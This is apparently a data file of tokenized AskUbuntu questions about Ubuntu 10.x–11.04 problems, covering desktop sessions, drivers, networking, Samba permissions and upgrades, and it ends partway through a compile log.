30938	how can i have different startup programs for `` desktop edition '' and `` classic edition '' sessions in 11.04 ?	when using classic edition , i would like to start cairo-dock automatically , when using desktop-edition , i do n't want to start it . how can i do that ? and how does that work with xfce and kde ?
30940	which music player can write ratings to tags , or : how to not lose my song ratings upon reinstall ?	one thing that has always annoyed massively is that all my ratings get lost when i reinstall my system . and that happens often . i know from mediamonkey for windows that it is possible to write the rating to tags . interestingly , when loading the songs into banshee , for instance , the ratings are recognized in fact ! but apparently , banshee does not write ratings to the id3 tag itself . which player is capable of that ?
30942	why does my resolv.conf file get regenerated every time ?	my /etc/resolv.conf file gets regenerated every time , making me loose google dns servers when i reconnect my 3g modem . for changing the dns settings , i looked at http : //code.google.com/intl/fr-fr/speed/public-dns/docs/using.html . my dhclient.conf is pretty big ( 58 lines ) , so i posted it on pastebin . however , here is the entire dhclient.conf without comment lines or blank lines : option rfc3442-classless-static-routes code 121 = array of unsigned integer 8 ; send host-name `` < hostname > '' ; request subnet-mask , broadcast-address , time-offset , routers , domain-name , domain-name-servers , domain-search , host-name , netbios-name-servers , netbios-scope , interface-mtu , rfc3442-classless-static-routes , ntp-servers ; prepend domain-name-servers 8.8.8.8 , 8.8.4.4 ; i am using wvdial instead of network manager .
30948	get flash drive to cache disk reads to primary partition	basically i 'm looking for a way to mimic windows ' readyboost . i asked this question on unix.se to get an idea of whether this was even possible and it seems like it is . appparently there is a cachefs filesystem i can use to do this . flash drive : /dev/sdc1 ( fs : vfat ) main partition : /dev/sda5 ( fs : ext4 ) how can i configure ubuntu to do this ?
30952	how to turn on unity 11.04	i have just upgraded my desktopto 11.04 and was wondering if someone could explain how i use unity on it ? my understanding was it was on by default with 11.04 ? thanks
30955	why do n't some cursor themes show up in gnome ?	i have many cursor themes on my system that do n't show up in gnome 's list of themes , yet work fine in other desktop environments ( xfce , lxde , kde , etc ) . what can i do to get these to show up ? . is there some way to fix this ?
30961	nec corporation upd720200 usb 3.0 controller does n't run at full speed	i have fresh install of ubuntu 10.10 . i have external hd on usb 3.0 . trying to connect this via pci express nec controller . dmesg : [ 8966.820078 ] usb 6-3 : new high speed usb device using xhci_hcd and address 0 [ 8966.839831 ] xhci_hcd 0000:02:00.0 : warn : short transfer on control ep [ 8966.840580 ] xhci_hcd 0000:02:00.0 : warn : short transfer on control ep [ 8966.841329 ] xhci_hcd 0000:02:00.0 : warn : short transfer on control ep [ 8966.842079 ] xhci_hcd 0000:02:00.0 : warn : short transfer on control ep [ 8966.843343 ] scsi8 : usb-storage 6-3:1.0 [ 8967.847144 ] scsi 8:0:0:0 : direct-access samsung hd204ui 1aq1 pq : 0 ansi : 5 [ 8967.847589 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 8967.847923 ] sd 8:0:0:0 : [ sdb ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 8967.848341 ] xhci_hcd 0000:02:00.0 : warn : stalled endpoint [ 8967.850959 ] sd 8:0:0:0 : [ sdb ] write protect is off [ 8967.850963 ] sd 8:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 8967.850966 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8967.851818 ] xhci_hcd 0000:02:00.0 : warn : stalled endpoint [ 8967.852365 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8967.852370 ] sdb : sdb1 [ 8967.871315 ] xhci_hcd 0000:02:00.0 : warn : stalled endpoint [ 8967.871853 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8967.871856 ] sd 8:0:0:0 : [ sdb ] attached scsi disk [ 8967.950728 ] xhci_hcd 0000:02:00.0 : warn : stalled endpoint [ 8967.951355 ] sd 8:0:0:0 : [ sdb ] sense key : recovered error [ current ] [ descriptor ] [ 8967.951361 ] descriptor sense data with sense descriptors ( in hex ) : [ 8967.951363 ] 72 01 04 1d 00 00 00 0e 09 0c 00 00 00 00 00 00 [ 8967.951375 ] 00 00 00 00 00 50 [ 8967.951380 ] sd 8:0:0:0 : [ sdb ] asc=0x4 ascq=0x1d [ 8968.790076 ] xhci_hcd 0000:02:00.0 : hc died ; cleaning up [ 8968.790076 ] usb 6-3 : usb disconnect , address 2 [ 8999.008554 ] scsi 8:0:0:0 : [ sdb ] unhandled error code [ 8999.008558 ] scsi 8:0:0:0 : [ sdb ] result : hostbyte=did_time_out driverbyte=driver_ok [ 8999.008562 ] scsi 8:0:0:0 : [ sdb ] cdb : read ( 10 ) : 28 00 74 70 97 39 00 00 3e 00 [ 8999.008573 ] end_request : i/o error , dev sdb , sector 1953535801 [ 8999.008578 ] buffer i/o error on device sdb1 , logical block 1953535738 [ 8999.008582 ] buffer i/o error on device sdb1 , logical block 1953535739 [ 8999.008585 ] buffer i/o error on device sdb1 , logical block 1953535740 [ 8999.008589 ] buffer i/o error on device sdb1 , logical block 1953535741 [ 8999.008592 ] buffer i/o error on device sdb1 , logical block 1953535742 [ 8999.008595 ] buffer i/o error on device sdb1 , logical block 1953535743 [ 8999.008600 ] buffer i/o error on device sdb1 , logical block 1953535744 [ 8999.008603 ] buffer i/o error on device sdb1 , logical block 1953535745 [ 8999.008606 ] buffer i/o error on device sdb1 , logical block 1953535746 [ 8999.008609 ] buffer i/o error on device sdb1 , logical block 1953535747 [ 8999.008642 ] scsi 8:0:0:0 : rejecting i/o to offline device [ 8999.008747 ] scsi 8:0:0:0 : [ sdb ] unhandled error code [ 8999.008749 ] scsi 8:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 8999.008752 ] scsi 8:0:0:0 : [ sdb ] cdb : read ( 10 ) : 28 00 74 70 97 77 00 00 3e 00 [ 8999.008760 ] end_request : i/o error , dev sdb , sector 1953535863 sudo lspci -v 2:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 ) physical slot : 32 flags : bus master , fast devsel , latency 0 , irq 16 memory at fe9fe000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable- count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ff-ff-ff-ff-ff-ff-ff-ff capabilities : [ 150 ] # 18 kernel driver in use : xhci_hcd kernel modules : xhci-hcd if i try to put into this controller any usb 2.0 , it works fine . but usb 3.0 nope . any idea ?
30962	good business card creation software ?	anyone have good business card creation software ? i found this good solutions for the creation of business cards ; glabels , inkscape and libreoffice . but are they the only solutions ? printing labels and business cards in ubuntu maybe someone else has some more suggestions ?
30964	ubuntu does not recognize my built-in monitor	i 've recently discovered of a boot problem ubuntu has with my laptop . i have successfully installed ubuntu on two other computers , and i 've never experienced this problem . what happens is , after the live boot cd loads , the screen goes completely blank . although , i suspected that there was no problem booting , so i loaded with bios only , which worked perfectly fine . of course , not being very proficient with this , i have no idea what needs to be done to fix the problem . i have switchable graphics cards ( the ati mobility radeon hd 5650 , and some low-end intel card ) , and an intel i5 quad core processor . i was booting with the ubuntu 10.10 64 bit desktop distribution . if there 's any more information you need from me , please let me know . edit : i was able to look into this a bit more , thanks to one of the comments provided , and i have some new information . ubuntu does seem to be able to recognize both of my graphics cards . the problem i found was that , in the xorg.0 log , it mentions that there were `` no screens found . '' i 'm using a notebook , so the screen is built in . does anyone know of a way to get ubuntu to recognize the monitor ?
30970	how can i prevent an app from leaving full screen mode when i move the cursor to another display ?	when i have dual displays set up , or when i am using synergy to use one keyboard and mouse across two computers/screens , i ca n't seem to retain f11 full screen mode for the top application when i mouse out of that screen . this applies to both the application and also to any flash video that may be playing in full screen mode . is there any way to retain full screen mode and mouse out of the display ?
30971	install/live will not work with my ati radeon 4550 graphics card	system : hp pavillion graphics : ati radeon force 3d 4550 i have tried to install ubuntu 10.10 from install/live dvd and the screen flashes on and off . tried in text mode it installed but when booted the screen flashes on and off . can you help ?
30975	how to pxe-boot from ubuntu 10.04 desktop edition ?	my aim is to install the ubuntu 10.04 desktop version on a remote machine using pxe-boot . i 'm trying to apply the steps given in pxe-boot for ubuntu 9.10 . ( i know this is for 9.10 ) . in `` step 8 . setting up boot files '' , it says cp -a /media/cdrom/install/netboot/* /tftpboot/ but i was n't able to find the netboot folder in my ubuntu 10.04 desktop cd . does that folder only exist in ubuntu server edition ? is it possible to do this in the desktop edition ?
30978	is there a way to grep the gnome-terminals history ?	is the terminals output ( i.e . not commands ) history hiding somewhere that lets me do something like.. grep `` foo foo \d { 5 } '' ~/.terminal i 'm aware i can simply pipe stuff to grep , or save it to a file rather than putting it in the terminal . it 's just that sometimes i 've had a program output some stuff i 'd like to search through but would rather not rerun it just for greps benefit . : )
30982	remember folder location in chrome	when i upload a file in chrome , chrome only remembers the parent folder when i continue with a next file . i need to upload dozens of files in the same folder , so this gets very time-consuming . example : i click on browse in a form , go to /home/user/desktop and select a file . i click on another browse button in a form , and the popup opens in /home/user , so i need to go to desktop manually . any idea ?
30986	can i get application changelogs using the terminal ?	in order to look at changelogs for recently updated applications , i use synaptic . is there a way for me to get specific application changelogs using the terminal ?
30988	how do you set the title of the active gnome-terminal from the command line ?	is there a way to set the gnome-terminal title from within the terminal itself without having to right click on the tab . something like : active-terminal -- title `` foo '' there was a related question previously with an answer that almost lets you do this : how to change gnome-terminal title ? but that does n't set the gnome-terminal tab title only the window title .
30993	fixing software center catalog	i 'm new to ubuntu , it looks like it is better than windows . last day i tried to install kget ( the download manager ) but during the process my computer suddenly stopped working . so i had to switch it off . after i logged into ubuntu again i ca n't install any program . the ubuntu software center says : items can not be installed or removed until package catalog is repaired . do you want to repair it now ? after i clicked repair it says ( after few seconds ) : package operation fails - the installation or removal of a software package failed i 've tried several times , but the same problem occurred . can anyone tell me a solution for this problem ?
30995	network connection on an acer aspire 5253 ?	i bought an acer laptop 5253-bz893 and i got ubuntu 10.10 installed with no problem . the only problem i have is , that i get no network connection options , wired or wireless . i just get no network devices available the computer came with windows 7 installed and i am able to connect to my wireless network fine using windows . i can not figure out why i ca n't get a network connection in ubuntu . any suggestions ?
30996	can i use a c/c++ compiler ?	i shifted to ubuntu 10.10 now i am facing problem to have c/c++ compiler . what are the possible ways so that i can use c/c++ compiler using all the libraries ( like graphic , math , conio , stdlib , etc ) as in microsoft windows creating executable file ?
31006	gwibber is too slow	opening gwibber from the indicator panel menu takes about 2 seconds . any idea why it feels so sluggish ? tweetdeck is much faster .
31013	how do i install the ath5k driver ?	i 'm trying to install the ath5k driver in maverick , but the instructions at https : //help.ubuntu.com/community/eeepc/fixes # wireless do n't work . i 've tried to install ( sudo apt-get install ) linux-backports-modules-intrepid-generic , and also linux-backports-modules-maverick-generic , but both ca n't be found . thanks for your response !
31016	how to report a crash when there is n't a .crash file	i am suffering from a bug/crash in natty , which i have logged in launchpad : https : //bugs.launchpad.net/unity/+bug/737928 the response i got back on my bug was a `` provide us with a .crash file , or we wo n't look into it '' . not very helpful really , but i can understand that the developers need something to work with . i have checked for this .crash file , which i can provide , but it is n't there . so , my question is , what else can i provide/do in order to get this bug looked at and fixed ? it ca n't be a specific problem as it happens to both my 32bit laptop and my 64bit desktop , both being very different machines , and it is stopping me from connecting to my development & backup network machines so i ca n't do my work ... it turns out that i had to replicate the bug a number of times before i finally got promoted to report it by apport . it would be nice , though , if there was a simpler way .
31020	uninstalled aplications still show launcher icons under installed aplications ?	the question is in the title , i always remove applications that i do not use after installing or upgrading , this includes games etc ( wish it was possible to install ubuntu with no applications then add the ones i require after , is this possible ? ) anyway after removing the applications they still show under the installed applications menu , if you click on them nothing happens but how do i get rid of the remaining icons ?
31023	how to configure eth0 manually ?	how to manually configure eth0 in ubuntu ? i do n't have any dhcp server . do i need ip address when i am just going to capture packets ?
31029	how do i get a ralink rt2070 wireless usb stick to work ?	i put in the wireless lan card into the usb port , being new to ubuntu i 'd expect something like windows ... auto installing itself , but nothing happened . with the card i have a disc for the wireless lan card to install . inside of the disc there is a folder called linux . i 'm assuming that that is how i install the driver . inside of that folder there are two more folders . one is which is for the driver . inside of that is a .tar.bz2 folder and inside of that is two more folders called module and wpa supp . i have no idea and i did tried to search . i found a little bit of stuff but i do n't think i understand . could someone please give me the exact instructions to install the driver/files for it ? i 'm using ubuntu 10.10 and the card is a rt2070 ralink lan usb 11b/g 54m wireless card 802.11 . pastebin of dmesg : http : //pastebin.com/urfy3nsr representative portion in case pastebin wipes this entry : [ 234.984025 ] hub 1-0:1.0 : can not enable port 8 . maybe the usb cable is bad ? [ 234.984041 ] hub 1-0:1.0 : unable to enumerate usb device on port 8 [ 235.184037 ] hub 5-0:1.0 : unable to enumerate usb device on port 2 [ 235.744031 ] usb 5-2 : new full speed usb device using uhci_hcd and address 8 [ 235.864020 ] usb 5-2 : device descriptor read/64 , error -71 ralink also has a page for support ... http : //eng.ralinktech.com.tw/support.php ? s=2 this is what the readme file says , but it is to complicated to understand , maybe someone can translate it so it 'll be less complicated ? http : //pastebin.com/htfrhy2w here are all folders/file names that is in the folder for the wireless usb driver http : //pastebin.com/1y8uvyqy
31032	can i disable the lock screen that happens when i close my dell d430 ?	i would like to be able to bounce straight back to where i left off and the lock screen is just a pain . please help
31039	compiling library from source code , how to overwrite current package ?	so here 's the short story . i wanted to compile the latest transmission client from source but in order to do that i needed the libevent-2 library which is not available from ubuntu 10.04 's repository . therefore , i grabbed libevent-2 's source code , compiled it and installed it ( sudo make install ) . i am now able to compile transmission and install it . however , when i try to launch it /usr/local/bin/transmission-gtk , i get the following error : /usr/local/bin/transmission-gtk : error while loading shared libraries : libevent-2.0.so.5 : can not open shared object file : no such file or directory however , libevent-2.0.so.5 is in the /usr/local/lib directory instead of /usr/local/lib . is that possibly the problem ? where should i go from here ?
31047	how do i know if apt-get is going to do a partial upgrade ?	i often update my system with apt-get update & & apt-get dist-upgrade . this caused me a few problems with natty and nvidia drivers . someone on irc told me that 's because i did a partial upgrade , but i did not know . how do i know if apt-get is going to do a partial upgrade ?
31050	trackpad mimic apple 's command click	i have a laptop that has a trackpad for the mouse . i 'm not using all the multi-touch capabilities of the trackpad and am currently only able to get left click working . is there any way to setup win+click as right click ? this would be kind of like command+click on apple machines .
31051	why is bzip2 needed in the kernel patch instructions ?	this was from here . extract the patch tar -xvzf /usr/src/web100-2.5.22-200810130047.tar.gz bzip2 web100/ web100-2.6.27-2.5.22-200810130047.patch test the patch bzip2 -dc /usr/src/linux/web100/ web100-2.6.27-2.5.22-200810130047.patch.bz2 | patch -p1 -- dry-run i looked at the .patch , the diff output of many files and the file .patch.bz2 after the bzip2 command which is too also the diff output of many files , they seem to be the same . my question is why is bzip2 even needed to turn the .patch into a .patch.bz2 ? is it for the redirection to std output from the -dc option for the patch command ? even if it is , why not just not just use the patch command in the form something like this : patch -p1 < patchfile ? i do n't see why the bzip2 is done here . also , i think the bzip2 might have an extra space in the command after web100/ , right ?
31063	bash command history not working	the command history between sessions is not getting saved . i 'm using guake and the history for the session is working fine . i noticed that .bash_history had some commands i executed in sudo -s mode and tried the same again and all the commands while in the session got saved so i tried chmod 777 .bash_history now the old commands appear at the start of a session but no new commands are getting saved thanx in advance
31064	ubuntu is n't on google 's list of summer of code participants	google have just published their list of accepted mentoring organisations for summer of code 2011 , but ubuntu is n't listed there . jono bacon has confirmed that ubuntu applied for a position , so i can only conclude that the application was unsuccessful . can anyone clarify whether or not this is the case ?
31067	how do i install non-free drivers and codecs without an internet connection ?	i have installed ubuntu 10.10 on my pc . i dont have internet connection . now i have n't installed third party software like for music , video , graphics , display . so how do i do that ? please help me .
31069	how to open a file manager of the current directory in the terminal ?	when i work in terminal , sometimes i want to open the current directory in a gui file manager . and then to click the items in the window to run the application . how can i do this ?
31076	how can i force ubuntu to use the bios internal clock instead of ntp or whatever its being used ?	my clock starts running out of sync in ubuntu which does n't happen in windows . the problem is that it just starts losing time after a moment of syncing it with an ntp server , that means the clock is broken . so how can i make the system use the hardware clock instead ( i tried adjtimex ) . btw : please do n't suggest the cmos battery , it 's not the correct answer .
31077	how can i download youtube videos ?	first i tried with youtube-dl and all the times ( and all days ) for all videos it gives this same error : youtube-dl http : //www.youtube.com/watch ? v=6zwwttac7o8 [ youtube ] setting language [ youtube ] 6zwwttac7o8 : downloading video info webpage [ youtube ] 6zwwttac7o8 : extracting video information error : format not available for video then i tried minitube latest version . but it just cant open the video . it just keeps trying to open video . it is unable to even play or download any video . also in old days , whenever i play video in youtube.com that was automatically was saved in my /tmp . but that is also not happening these days . what can i use for downloading youtube videos ? i am using lucid 64 bit . edit1 : i dont want to use any extensions to firefox . i like my firefox without any extension . with extension it becomes soooooo slow and inactive .
31080	installing nvidia drivers for quadro fx 880m on 10.10 caused shutdown/startup issues	so i was facing weird graphics drivers issues due to the default nouveau drivers that came installed with ubuntu 10.10 hence i installed the latest nvidia graphics drivers & the weird graphics issues stopped happening . so far so good , but when i tried to shut down the laptop it got stuck at the window with text 15 , shutting down ... modem-manager : caught signal 15 , shutting down ... init : disconnected from system us init : dbus main process ( 1107 ) killed by term signal and this happens .everytime.without.fail . i tried updating the kernel and any/all drivers through update manager but it still happens . not only this even the startup screen is totally screwed up . it just displays ubuntu 10.10 in text with 3 dots . but that is acceptable . to power cycle down the laptop each and everytime for shutdown is not . same goes for when i try to restart . interesting thing is if i try to shutdown the laptop when i am on the login screen it does so without any problems . i googled & many people seem to face the same issue but i could n't find any silver bullet hoping to find one here .
31081	what 's the difference between the server version and the desktop version ?	what 's the difference between the server version of ubuntu and the desktop version ?
31086	upgrade 10.04lts to 10.10 problem	checking for a new ubuntu release done upgrade tool signature done upgrade tools done downloading extracting 'maverick.tar.gz' authenticate 'maverick.tar.gz ' against 'maverick.tar.gz.gpg ' tar : removing leading `/ ' from member names reading cache checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done reading package lists ... done building dependency tree reading state information ... done building data structures ... done updating repository information warning : failed to read mirror file a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/tmpe_xvwd/maverick '' , line 7 , in < module > sys.exit ( main ( ) ) file `` /tmp/tmpe_xvwd/distupgrademain.py '' , line 158 , in main if app.run ( ) : file `` /tmp/tmpe_xvwd/distupgradecontroller.py '' , line 1616 , in run return self.fullupgrade ( ) file `` /tmp/tmpe_xvwd/distupgradecontroller.py '' , line 1534 , in fullupgrade if not self.updatesourceslist ( ) : file `` /tmp/tmpe_xvwd/distupgradecontroller.py '' , line 664 , in updatesourceslist if not self.rewritesourceslist ( mirror_check=true ) : file `` /tmp/tmpe_xvwd/distupgradecontroller.py '' , line 486 , in rewritesourceslist distro.get_sources ( self.sources ) file `` /tmp/tmpe_xvwd/distro.py '' , line 103 , in get_sources source.template.official == true and attributeerror : 'template ' object has no attribute 'official ' this is what i got when i tried to upgrade the desktop edition : sudo do-release-upgrade . one more info : i have kde installed .
31094	how can i type japanese characters ?	what is the way to be able to type japanese characters ? could someone make a how-to in order to explain the few steps to get it ?
31100	how do i install the cisco vpn client ?	what is best way to install a cisco vpn client application in ubuntu ?
31102	will unity lets users flick the left upper corner to reveal launcher ?	gnome shell gives uses the option of flicking the left upper corner with the mouse to achieve the same result as clicking activities . will unity give users the same option with respect to revealing the launcher ? can users move the mouse to the left upper corner instead of the left edge ? ( there is a separate question for opening the dash with the same action . )
31103	how to get my bluetooth-enabled phone to pipe its audio through my ubuntu machine ?	getting this set up was relatively simple on windows , but i ca n't quite figure out how to go about doing it in ubuntu . my phone is paired with the ubuntu machine , and i simply want to pipe the audio from the phone to it . however , i have no idea how to do this . note : i have blueman installed , if that helps .
31104	any introduction on how to use sisu ?	sisu is an application for documents structuring , publishing in multiple formats and search . i was wondering how well it is received by users , and if there are other similar applications that are comparable to or even better than sisuďź if there is some introduction to show its functionality and how to use it ; if there is some gui for it , as it is command line oriented ? thanks and regards !
31105	how can i add new logical partition ?	how can i add new logical partition ? i already have an extended partition , so i tried to use gparted to add a new logical partition . i tried to resize the extended partition , but such an option is not available . i tried to add a new logical partition but it only gave primary partition options .
31109	is there some application to download files from popular file hosting websites ?	i was wondering if there are some applications for downloading files from some popular hosting websites , automating the procedure of waiting and fetching links and downloading files , once we give the applications the links ? examples of such websites are rapidshare , uploading , megaupload , filesonic , fileserver , hotfiles , depositefiles , ifile . but the applications are not necessarily applicable to all of them . thanks and regards ! added : i just tried slimrat . it failed to download files from rapidshare . can it be because the website of rapidshare has changed recently and the parsing functionality for their website by slimrat is not up-to-date yet .
31115	error : svn : ca n't create directory .svn ' : permission denied	when i run : svn co http : ://mysvnserver.com/trunk -- username myuser i get error : svn : ca n't create directory .svn ' : permission denied ( i set folder permission to 755 with : chmod -r 755 + umask 022 , but i get error above ) what should i do ?
31119	install ubuntu on asus eee-pc 1005pe - dealing with special partitions	i have an asus eeepc 1005pe netbook and im planning on doing a massive re-partitioning ( going to install ubuntu , mint , xp , etc ) ive noticed it has 2 `` special '' partitions : a 10gb fat32 restore hidden partition ( used by bios `` f9 recovery '' feature ) and a 16mb `` unknown '' partition at the end of the drive ( used by bios `` boot booster '' feature ) . so , for both partitions , my question is : can i move/resize the recovery partition freely ? what are the requirements for it ? ( i mean , for it still be found by bios when i press f9/activate bootbooster ? ) . partition table order ? partition type ? flags ? label ? uuid ? can i make it a logical ( instead of primary ) partition ? does it must be the flagged as boot ? and , more importantly : where can i find any official documentation about it ? ive ready many ( mis ) information about it ... some say boot booster partition must be last ( in partition table ) , some say recovery must be 2nd , that it must be bootable , etc . how can i know what is really needed for the bios to use both f9 and boot booster ? note : im using gparted from a live usb stick ( mint 10 / ubuntu 10.10 ) , and ive noticed that , since the filesystem type of the boot booster is not recongnized , it cant move or resize it . can i delete it and re-create it somewhere else ? whenever i create a 0xef partition gparted crashes and quits and i can not open it again ( must delete the partition using fdisk / cfdisk )
31122	twinview broken on upgrade to 10.10	i have been on 9.10 for over a year on the grounds that if it ai n't broke , do n't fix it . however , i had a spare weekend and figured it was probably about time ... i performed an upgrade to 10.4 , and everything seemed to proceed smoothly , so i took the plunge and went for 10.10 . disaster . my twinview nvidia display which had been working perfectly is now broken . on boot everything seems fine , but when x starts and the second monitor springs into life the primary winks out and switches off - almost as if its been put into an unsupported display mode . the system seems to think there 's a second monitor - the nvidia logo is split across the two screens , but it ca n't seem to start . things i 've tried : swapping the monitors ( one is older than the other , and its definitely the port not the actual monitor ) rolling back to an old xorg conf from prior to the upgrade installing a non-beta driver direct from nvidia ( this seems to start both monitors but then apparently stops boot and causes the second display to 'wink ' . twinview seems non-functional , both displays are mirrors ) disabling edid disabling twinview , logging in and attempting to use the nvidia config to re-detect the monitors ( second monitor is falsely detected and wo n't go higher than 1024x768 . selecting 'apply ' causes one screen to go blank and the other to display garbage ) googling for about 5 hours looking for similar problems , none of the offered solutions seemed to work i 'm at a loss , and it is looking very much like i 'm going to have to go through a time consuming reinstall to downgrade back to the working 10.4 . any thoughts ?
31126	alt+sysrq+reisub hangs at `` resetting '' ( without actually resetting/restarting )	i 'm trying alt + sysrq + reisub to see how it would be used to restart my system safely in case of emergency . however , i find that alt + sysrq + reisub hangs at `` resetting '' ( without actually resetting/restarting ) in maverick . all other sysrq combinations appear to work correctly ( i.e . alt + sysrq + reisu ) . cat /proc/sys/kernel/sysrq returns 0 . but i 'm not sure it 's relevant because alt + sysrq certainly works . what can i do to have `` b '' actually restart the system ?
31129	asus eeepc fn+f2 ruins wireless until restart	i managed to get my wireless working beautifully ( ath5k driver working great ) , and it works over a disable/enable wireless cycle , even a suspend/wakeup cycle ( read some people have issues with that ) . unfortunately , i discovered that if i press fn+f2 on my keyboard ( asus eeepc 900ha , so that 's the wireless toggle key ) , wireless then stops working until i restart the computer . how can i fix this ? i 'm running unr 10.10 ( with unity turned off tyvm ! ) . i heard something about jupiter controlling these keys , but what about asus-laptop ? how can i fix this behaviour ? tia . ( note , i 'm a power user , but still fairly new to linux . i 'm picking up speed though ) .
31131	multiple shells in one window	the default behavior of my shell window is to create tabs . i can switch between those tabs but only one tab can be visible at a time . is it possible to open multiple shells in the same window ? e.g . have a window split 4-ways with each pane running it 's own instance of a shell . i would prefer this over tabs since i can run my shell window full-screen at see 4 shells at the same time .
31139	how do i get the ubuntu loginscreen etc back after installing xubutu-desktop ?	i wanted to test out xfce , so i installed xubuntu-desktop , but unfortunately , it 's changed my logonscreen , and all those other types of pre/post session screens . how do i return them to the gnome defaults ? i ca n't find any options within gnome itself , like i could in my brief fling with kde . thanks for your time .
31147	how to grant write permissions in samba ?	i 'm having trouble with read/write permissions on my samba server , how do i fix my smb.conf and file permissions to have a more unified access ? smb.conf [ global ] workgroup = workgroup netbios name = lnxnas server string = % h wins support = no dns proxy = no security = user encrypt passwords = yes panic action = /usr/share/samba/panic-action % d [ homes ] comment = home directories [ video ] path = /data/eric/videos [ music ] path = /data/eric/music [ pictures ] path = /data/eric/pictures [ data ] path = /data writeable = yes my ls -l of /data/eric/pictures drwxrwxrwx 2 ericfoss root 4096 2011-03-13 22:09 android projs drwxrwxrwx 3 ericfoss root 4096 2011-03-13 22:09 automotive -rwxrwxrwx 1 ericfoss root 2439 2010-12-17 17:03 bdd reduction.png -rwxrwxrwx 1 ericfoss root 2722 2010-12-17 16:55 bdd tree.png -rwxrwxrwx 1 ericfoss root 7341 2010-12-17 16:46 bdd tree.xcf -rwxrwxrwx 1 ericfoss root 72421 2007-11-22 22:59 bum ninja.jpg -rwxrwxrwx 1 ericfoss root 32152 2010-12-17 21:25 cell transition.png -rwxrwxrwx 1 ericfoss root 40212 2010-12-17 17:55 control graph.png drwxrwxrwx 2 ericfoss root 4096 2011-03-13 22:09 crap -rwxrwxrwx 1 ericfoss root 82 2010-09-20 17:18 desktop.ini ericfoss @ server : ~ $ output from samba4 restart sudo /etc/init.d/samba4 restart * stopping samba 4 daemon samba [ ok ] * starting samba 4 daemon samba unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` valid users '' ignoring unknown parameter `` valid users '' [ ok ] i ca n't delete , rename or create files ...
31148	how to connect to the internet reliably	i have a dsl internet connection . for a long time the internet functioned fine in ubuntu using the default network manager . recently however , my isp was bought by another isp , and the service name had to be changed in the dsl settings . in windows , it connects without any issue whatsoever . but in ubuntu , the first time i connect i get a `` apache : not found '' page , the next time , i get to the previous isp 's login page , it continues like this for some time until i get it working . i have to try connecting it again and again . when i asked the customer service , they said that because of the takeover , they have switched servers . but they said , it should work properly in windows , and they were clueless about ubuntu . is there anything i can do to solve this issue ?
31152	maximized windows on unity start without covering the sidebar - how can i do that manually ?	this is how a maximized window looks when unity runs for the first time : and this is how a maximized window looks when i click on the `` maximize '' button - after i restore it : is there a shortcut to make a window get maximized without hiding the siderbar ( like in the first screeshot ) without making the siderbar always visible ?
31156	can i add back-in-time backups to ubuntu one ?	how can i add back-in-time backup to my ubuntu one cloud ? can i only sync files ( no dropbox-like functionality ) ?
31158	how to install ruby on rails and mysql ?	how to install ruby on rails and mysql on my ubuntu 10.04 os ?
31163	how to stop turning off sequence when power manager says that battery is too low and want to power down ?	according to this thread i can disable this thing altogether but this battery-critical-power-down not always happens . is there a way or terminal command that can stop the power manager shutting down my computer when that infamous message box pops up ?
31164	how to add a rich control ( not just menuitem ) for a applet like rhythmbox	i want to write a small tools in the form of applet , but not just a `` applet '' . i want to show a listview or anything in the applet , unfortunly it seems that only menu/menuitem can be add into applet . but anyone using rhythmbox must use the `` previous||pause||next '' button on the sound-applet so can anyone have a solution to make such a control ? any suggestion is welcome !
31165	built-in card-reader does n't work . hp compaq nx6325 notebook	i have a hp-compaq nx6325 notebook with an built-in card-reader ( sd , ms/pro , mmc , sm , xd ) and the ubuntu ( 10.10 . ) do n't see it . i 've tried to install it manually , with this steps ( and with this tifmxx driver ) , but does n't work . the compile log : $ echo /home/tvera/downloads/cr_install /home/tvera/downloads/cr_install $ make -c /lib/modules/2.6.35-25-generic/build m=/home/tvera/downloads/cr_install make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.35-25-generic' cc [ m ] /home/tvera/downloads/cr_install/tifm_core.o in file included from /home/tvera/downloads/cr_install/tifm_core.c:12 : /home/tvera/downloads/cr_install/linux/tifm.h:128 : error : field ‘cdev’ has incomplete type /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_uevent’ : /home/tvera/downloads/cr_install/tifm_core.c:69 : warning : passing argument 1 of ‘add_uevent_var’ from incompatible pointer type include/linux/kobject.h:244 : note : expected ‘struct kobj_uevent_env *’ but argument is of type ‘char **’ /home/tvera/downloads/cr_install/tifm_core.c:69 : warning : passing argument 2 of ‘add_uevent_var’ makes pointer from integer without a cast include/linux/kobject.h:244 : note : expected ‘const char *’ but argument is of type ‘int’ /home/tvera/downloads/cr_install/tifm_core.c : at top level : /home/tvera/downloads/cr_install/tifm_core.c:161 : warning : initialization from incompatible pointer type /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_free’ : /home/tvera/downloads/cr_install/tifm_core.c:170 : warning : type defaults to ‘int’ in declaration of ‘__mptr’ /home/tvera/downloads/cr_install/tifm_core.c:170 : warning : initialization from incompatible pointer type /home/tvera/downloads/cr_install/tifm_core.c : at top level : /home/tvera/downloads/cr_install/tifm_core.c:177 : error : unknown field ‘release’ specified in initializer /home/tvera/downloads/cr_install/tifm_core.c:178 : warning : initialization from incompatible pointer type /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_alloc_adapter’ : 